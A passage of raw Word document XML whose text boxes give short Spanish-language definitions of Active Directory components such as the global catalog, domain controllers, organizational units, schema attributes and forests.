          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15760384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75BCA213" wp14:editId="60A29F79">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10302240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2484120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1805939" cy="101536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39" cy="1015365"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5A36FD3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="143" w:right="140" w:firstLine="2"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Copia de solo lectura de todo el contexto de nomenclatura de dominio en el bosque. Se utiliza para impulsar las búsquedas en el dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="75BCA213" id="Textbox 149" o:spid="_x0000_s1099" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:811.2pt;margin-top:195.6pt;width:142.2pt;height:79.95pt;z-index:1576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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5A36FD3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="143" w:right="140" w:firstLine="2"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Copia de solo lectura de todo el contexto de nomenclatura de dominio en el bosque. Se utiliza para impulsar las búsquedas en el dominio</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59CCC670" wp14:editId="1FE59C98">
                <wp:extent cx="3055620" cy="462280"/>
                <wp:effectExtent l="9525" t="0" r="1905" b="13970"/>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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="764C6909" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1287" w:hanging="1045"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Colección de usuarios, grupos y equipos que están físicamente disponibles</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="59CCC670" id="Textbox 150" o:spid="_x0000_s1100" type="#_x0000_t202" style="width:240.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="764C6909" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1287" w:hanging="1045"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Colección de usuarios, grupos y equipos que están físicamente disponibles</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B527E5" wp14:editId="2EC84A45">
            <wp:extent cx="3070028" cy="395287"/>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66" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3070028" cy="395287"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF4720" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="9"/>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08320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54D5F6E2" wp14:editId="2F6D1053">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10264140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>97663</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1805939" cy="277495"/>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39" cy="277495"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="31C9E865" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="270"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Contiene una copia de AD DB</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="54D5F6E2" id="Textbox 152" o:spid="_x0000_s1101" type="#_x0000_t202" style="position:absolute;margin-left:808.2pt;margin-top:7.7pt;width:142.2pt;height:21.8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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="31C9E865" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="270"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Contiene una copia de AD DB</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08832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0617F9ED" wp14:editId="60DBAE4C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>83819</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>507619</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3055620" cy="460375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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460375"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="589788B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1109" w:hanging="663"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Disponible para una mejor gestión y organización de objetos protegibles</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0617F9ED" id="Textbox 153" o:spid="_x0000_s1102" type="#_x0000_t202" style="position:absolute;margin-left:6.6pt;margin-top:39.95pt;width:240.6pt;height:36.25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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="589788B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1109" w:hanging="663"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Disponible para una mejor gestión y organización de objetos protegibles</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09344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66BA7219" wp14:editId="19B816C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>480441</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="34036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40360"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="47C85D89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="55"/>
                              <w:ind w:left="905"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Componentes lógicos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="66BA7219" id="Textbox 154" o:spid="_x0000_s1103" type="#_x0000_t202" style="position:absolute;margin-left:307.25pt;margin-top:37.85pt;width:240.2pt;height:26.8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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="47C85D89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="55"/>
                        <w:ind w:left="905"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Componentes lógicos</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B88CA4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF8265A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E41C11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="140"/>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09856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="464EA723" wp14:editId="526EB132">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>83819</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>265594</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3055620" cy="462280"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1984533D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1736" w:hanging="1239"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Lista de atributos de un objeto protegible presente en AD</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="464EA723" id="Textbox 155" o:spid="_x0000_s1104" type="#_x0000_t202" style="position:absolute;margin-left:6.6pt;margin-top:20.9pt;width:240.6pt;height:36.4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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1984533D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1736" w:hanging="1239"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Lista de atributos de un objeto protegible presente en AD</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="58159C0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010A3CB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2968935D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEA30DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5260DB68" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CE182B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45821F55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="183"/>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10368" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B90AFF0" wp14:editId="78BA9627">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>90169</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>498066</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3049270" cy="449580"/>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449580"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="59FEE44C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="61" w:line="290" w:lineRule="exact"/>
                              <w:ind w:right="14"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Colección de controladores de dominio que comparten una raíz común</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22890E4E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="-1" w:right="704"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>dominio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7B90AFF0" id="Textbox 156" o:spid="_x0000_s1105" type="#_x0000_t202" style="position:absolute;margin-left:7.1pt;margin-top:39.2pt;width:240.1pt;height:35.4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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="59FEE44C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="61" w:line="290" w:lineRule="exact"/>
                        <w:ind w:right="14"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Colección de controladores de dominio que comparten una raíz común</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="22890E4E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="-1" w:right="704"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>dominio</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10880" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="291F3BB3" wp14:editId="2E41FA4D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3902075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286611</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3050540" cy="317500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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17500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5194C7C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="5" w:right="5"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bosques</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="291F3BB3" id="Textbox 157" o:spid="_x0000_s1106" type="#_x0000_t202" style="position:absolute;margin-left:307.25pt;margin-top:22.55pt;width:240.2pt;height:25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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5194C7C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="5" w:right="5"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bosques</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8E76E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D341DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="92"/>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11392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="342C1F42" wp14:editId="1BB8052A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>76200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>235368</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3055620" cy="276225"/>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276225"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
